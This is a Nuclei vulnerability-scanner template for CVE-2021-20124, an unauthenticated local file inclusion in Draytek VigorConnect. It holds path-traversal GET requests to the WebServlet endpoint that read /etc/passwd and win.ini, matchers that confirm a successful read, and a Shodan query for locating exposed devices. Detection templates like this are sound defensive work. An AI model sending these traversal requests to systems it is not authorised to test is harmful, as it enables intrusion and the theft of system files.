nuclei-templates/cves/2021/CVE-2021-20124.yaml

45 lines
1.4 KiB
YAML

id: CVE-2021-20124
info:
name: Draytek VigorConnect - Unauthenticated Local File Inclusion WebServlet
author: 0x_Akoko
severity: high
description: A local file inclusion vulnerability exists in Draytek VigorConnect 1.6.0-B3 in the file download functionality of the WebServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges.
reference:
- https://www.tenable.com/security/research/tra-2021-42
- https://www.draytek.com/products/vigorconnect/
- https://www.cvedetails.com/cve/CVE-2021-20124
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-20124
cwe-id: CWE-668
metadata:
shodan-query: http.html:"VigorConnect"
verified: true
tags: cve,cve2021,draytek,lfi,vigorconnect
requests:
- method: GET
path:
- "{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd"
- "{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- "for 16-bit app support"
condition: or
- type: word
part: header
words:
- "application/octet-stream"
- type: status
status:
- 200